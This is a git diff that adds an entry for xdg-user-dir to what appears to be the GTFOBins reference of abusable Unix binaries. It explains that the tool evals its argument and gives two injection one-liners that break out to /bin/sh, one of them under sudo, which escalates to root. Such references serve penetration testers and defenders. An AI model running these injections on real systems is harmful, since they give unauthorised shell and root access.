diff --git a/_gtfobins/xdg-user-dir.md b/_gtfobins/xdg-user-dir.md new file mode 100644 index 0000000..e340203 --- /dev/null +++ b/_gtfobins/xdg-user-dir.md @@ -0,0 +1,11 @@ +--- +description: | + The current implementation of `xdg-user-dir` is basically `eval echo \${XDG_${1}_DIR:-$HOME}`, thus is can be easily used to achieve command execution. +functions: + shell: + - code: | + xdg-user-dir '}; /bin/sh #' + sudo: + - code: | + sudo xdg-user-dir '}; /bin/sh #' +---